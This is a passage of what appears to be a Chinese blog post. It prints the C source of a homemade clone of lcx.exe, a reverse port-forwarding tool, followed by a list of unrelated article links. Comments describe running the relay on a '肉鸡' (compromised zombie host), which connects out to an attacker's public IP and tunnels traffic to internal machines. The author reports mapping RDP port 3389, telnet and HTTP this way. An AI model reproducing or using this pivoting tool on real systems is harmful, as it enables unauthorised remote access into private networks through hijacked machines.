server2IP, server2Port); if(client_connect(sockfd2,server2IP,server2Port)==0) { closesocket(sockfd2); sprintf(buffer,"[SERVER]connection to %s:%d error\r\n", server2IP, server2Port); send(sockfd1, buffer, strlen(buffer), 0); memset(buffer, 0, 1024); closesocket(sockfd1); continue; } makelog(true, "代理成功"); //线程传参 transocket sock; sock.fd1 = sockfd1; sock.fd2 = sockfd2; //创建线程,转发数据 DWORD dwThreadID; HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) { TerminateThread(hThread, 0); return; } Sleep(1000); } } //肉鸡转发数据 void conn2conn(char *publicIP, int publicPort, char *host2, int port2) { SOCKET sockfd1,sockfd2; fd_set fds; //这个循环的作用是建立多个连接,比如控制端和肉鸡建立一个连接之后断开,再次连接肉鸡仍然是可以的(这次依靠的就是第二条连接) while(1) { if((sockfd1=create_socket())==0) return; if((sockfd2=create_socket())==0) return; makelog(true,"试图连接到公网地址 %s:%d", publicIP, publicPort); //连接到公网 if(client_connect(sockfd1,publicIP,publicPort) == 0) { closesocket(sockfd1); closesocket(sockfd2); continue; } makelog(true,"连接到公网成功"); // fix by bkbll // if host1:port1 recved data, than connect to host2,port2 int l=0; char buffer[MAXSIZE]; memset(buffer,0,MAXSIZE); //做一个死循环是为了防止出错,正常情况流程只走一次 while(1) { FD_ZERO(&fds); FD_SET(sockfd1, &fds); //第一个参数系统忽略,最后一个参数为NULL代表永久等待 if (select(sockfd1+1, &fds, NULL, NULL, NULL) == SOCKET_ERROR) { if (errno == WSAEINTR) continue; break; } if (FD_ISSET(sockfd1, &fds)) { l=recv(sockfd1, buffer, MAXSIZE, 0); break; } Sleep(5); } //错误校验 if(l <= 0) { makelog(true,"recv函数出错了,重新建立连接"); continue; } //做一个死循环是为了防止出错,正常情况流程只走一次 while(1) { //输出日志 makelog(true,"试图连接到内网地址 %s:%d", host2, port2); //连接到自己(或者另一个同局域网内网IP,或者一个公网IP) if(client_connect(sockfd2,host2,port2) == 0) { closesocket(sockfd1); closesocket(sockfd2); continue; } //向sockfd2发送数据 if(send(sockfd2,buffer,l,0) == SOCKET_ERROR) { makelog(true,"send函数出错了"); continue; } //重置缓冲区 l=0; memset(buffer,0,MAXSIZE); break; } makelog(true,"成功连接到两端"); //线程参数 transocket sock; sock.fd1 = sockfd1; sock.fd2 = sockfd2; //创建线程 DWORD dwThreadID; HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) { TerminateThread(hThread, 0); return; } Sleep(1000); printf("[+] CreateThread OK!\r\n\n"); } } //服务器转发数据 void transmitdata(LPVOID data) { //解析参数(两个socket句柄) SOCKET fd1, fd2; transocket *sock; sock = (transocket *)data; fd1 = sock->fd1; fd2 = sock->fd2; //准备采用select模型 fd_set readfd,writefd; char read_in1[MAXSIZE],send_out1[MAXSIZE]; char read_in2[MAXSIZE],send_out2[MAXSIZE]; struct sockaddr_in client1,client2; char host1[20],host2[20]; int port1=0,port2=0; char tmpbuf[100]; memset(host1,0,20); memset(host2,0,20); memset(tmpbuf,0,100); int structsize1 = sizeof(struct sockaddr); int structsize2 = sizeof(struct sockaddr); //获取第一客户端信息 if(getpeername(fd1, (struct sockaddr *)&client1, &structsize1)<0) { strcpy(host1, "fd1"); } else { strcpy(host1, inet_ntoa(client1.sin_addr)); port1=ntohs(client1.sin_port); } //获取第二客户端信息 if(getpeername(fd2,(struct sockaddr *)&client2,&structsize2)<0) { strcpy(host2,"fd2"); } else { strcpy(host2,inet_ntoa(client2.sin_addr)); port2=ntohs(client2.sin_port); } //输出两个客户端信息 makelog(true,"建立数据转发走向(%s:%d <-> %s:%d)", host1, port1, host2, port2); //最大检测数目 int maxfd = max(fd1,fd2)+1; //设置检测超时 struct timeval timeset; timeset.tv_sec=TIMEOUT; //超时秒数 timeset.tv_usec=0; //超时微秒 //位模式清零 memset(send_out1,0,MAXSIZE); memset(send_out2,0,MAXSIZE); //可读长度 int totalread1=0,totalread2=0; while(1) { //采用select异步模型 FD_ZERO(&readfd); FD_ZERO(&writefd); //添加到fd集合 FD_SET((UINT)fd1, &readfd); FD_SET((UINT)fd1, &writefd); FD_SET((UINT)fd2, &readfd); FD_SET((UINT)fd2, &writefd); //第一个参数会被系统忽略掉 int result=select(maxfd, &readfd, &writefd, NULL, ×et); if((result<0) && (errno!=EINTR)) { //程序出错 makelog(true,"select函数出错"); break; } else if(result==0) { //等待超时 makelog(true,"select函数等待超时"); continue; } //fd1可读 if(FD_ISSET(fd1, &readfd)) { //只要可读,一次即可读取完整,无需while循环 //if(totalread1) { memset(read_in1,0,MAXSIZE); int read1=recv(fd1, read_in1, MAXSIZE-totalread1, 0); if((read1==SOCKET_ERROR) || (read1==0)) { makelog(true,"读取fd1出错"); break; } //改变fd1的发送缓冲区和他的大小(接了就要发嘛) memcpy(send_out1+totalread1, read_in1, read1); totalread1+=read1; //日志输出 makelog(true,"fd1成功在地址:%16s:%d上面读取%d字节", host1, port1, read1); } } //fd2可写 if(FD_ISSET(fd2, &writefd)) { int err=0; int sendcount1=0; //发送的话可能一次发不完(数据包过大) while(totalread1>0) { int send1=send(fd2, send_out1+sendcount1, totalread1, 0); //出错检查 if(send1==0) break; if((send1<0) && (errno!=EINTR)) { makelog(true,"写入fd2出错"); err=1; break; } if((send1<0) && (errno==ENOSPC)) break; //改变缓冲区大小 sendcount1 += send1; totalread1 -= send1; //日志输出 makelog(true,"fd2成功在地址:%16s:%d上面发送%d字节", host2, port2, send1); } //检验出错 if(err==1) break; //如果发送了数据,并且没有发送干净 if((totalread1>0) && (sendcount1>0)) { //理论上下面两行永远不会执行 memcpy(send_out1,send_out1+sendcount1,totalread1); memset(send_out1+totalread1,0,MAXSIZE-totalread1); } else { memset(send_out1,0,MAXSIZE); } } //fd2可读 if(FD_ISSET(fd2, &readfd)) { //只要可读,一次即可读取完整,无需while循环 //if(totalread2) { memset(read_in2,0,MAXSIZE); int read2=recv(fd2,read_in2,MAXSIZE-totalread2, 0); if(read2==0)break; if((read2<0) && (errno!=EINTR)) { makelog(true,"读取fd1出错"); break; } //接了就立即发出去 memcpy(send_out2+totalread2,read_in2,read2); totalread2+=read2; //日志输出 makelog(true,"fd1成功在地址:%16s:%d上面读取%d字节", host2, port2, read2); } } //fd1可写 if(FD_ISSET(fd1, &writefd)) { int err2=0; int sendcount2=0; while(totalread2>0) { int send2=send(fd1, send_out2+sendcount2, totalread2, 0); if(send2==0)break; if((send2<0) && (errno!=EINTR)) { makelog(true,"写入fd1出错"); err2=1; break; } if((send2<0) && (errno==ENOSPC)) break; sendcount2+=send2; totalread2-=send2; //日志输出 makelog(true,"fd1成功在地址:%16s:%d上面发送%d字节", host1, port1, send2); } if(err2==1) break; if((totalread2>0) && (sendcount2 > 0)) { memcpy(send_out2, send_out2+sendcount2, totalread2); memset(send_out2+totalread2, 0, MAXSIZE-totalread2); } else { memset(send_out2,0,MAXSIZE); } } Sleep(5); } //关闭socket closesocket(fd1); closesocket(fd2); makelog(true,"成功关闭掉两个socket,fd1,fd2"); } //关闭套接字 void closeallfd() { for(int i=3; i<256; i++) { closesocket(i); } makelog(true,"成功关闭所有socket"); if(fp != NULL) { fclose(fp); } } //创建一个套接字 int create_socket() { int sockfd; sockfd=socket(AF_INET,SOCK_STREAM,0); if(sockfd<0) { makelog(true,"socket函数出错"); return(0); } return(sockfd); } //创建一个服务器 int create_server(int sockfd,int port) { //地址声明 struct sockaddr_in srvaddr; memset(&srvaddr, 0, sizeof(struct sockaddr)); srvaddr.sin_port=htons(port); srvaddr.sin_family=AF_INET; srvaddr.sin_addr.s_addr=htonl(INADDR_ANY); //端口复用 int on=1; setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR, (char*)&on,sizeof(on)); //协议绑定 if(bind(sockfd, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr))<0) { makelog(true,"bind函数出错"); return(0); } //进行监听 if(listen(sockfd,CONNECTNUM)<0) { makelog(true,"listen函数出错"); return(0); } return(1); } //尝试连接次数 int tryConnectServer = 0; //客户端连接到服务器 int client_connect(int sockfd, char* server, int port) { tryConnectServer ++; struct sockaddr_in cliaddr; struct hostent *host; if(!(host=gethostbyname(server))) { makelog(true,"无法获取目标主机相关信息 IP:%s", server); return(0); } memset(&cliaddr, 0, sizeof(struct sockaddr)); cliaddr.sin_family=AF_INET; cliaddr.sin_port=htons(port); cliaddr.sin_addr=*((struct in_addr *)host->h_addr); if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0) { makelog(true,"连接到公网失败 %s:%d-----%d次", server, port, tryConnectServer); return(0); } return(1); }
实地测试的时候发现,3389映射成功,可以连接上但是屏幕是黑的不知道怎么回事,我试了试从网上下载来的lcx.exe也是黑屏
不知道怎么回事,还有就是ftp协议映射失败,telnet协议和http协议都映射正常,至于前面面两个为甚映射失败有机会我接着研究吧。
相关文章推荐
- Java异常处理
- springmvc中解决406问题
- Spring_00600_IOC_annotation_Components
- Web工程依赖java工程不编译
- JAVA Arrays.binarySearch
- 翁恺导师第1周编程题"设计一个表示分数的Fraction类”--网易云课堂
- C# 中的用户自定义控件和WPF的配合使用
- 写给编程语言,虚拟机,优化以及未来之路
- 使用国内镜像通过pip安装python的一些包(转)
- [leetcode-66]plus one(java)
- ireport jasperreport 主报表向子报表传递参数
- 《写给大忙人看的java SE8》笔记 -- 2. Stream
- Spring JDBCTemplate Query步骤查询
- 动态链接库(DLL)编程深入浅出
- Spring multipart file上传
- 初学者之php基础(三)
- Algorithms—205.Isomorphic Strings
- Scala 深入浅出实战经典 第45讲: scala中context bounds代码实例
- 检索01-c#中基本数据类型和引用类型的区别
- C/C++ 常见面试题目 (一)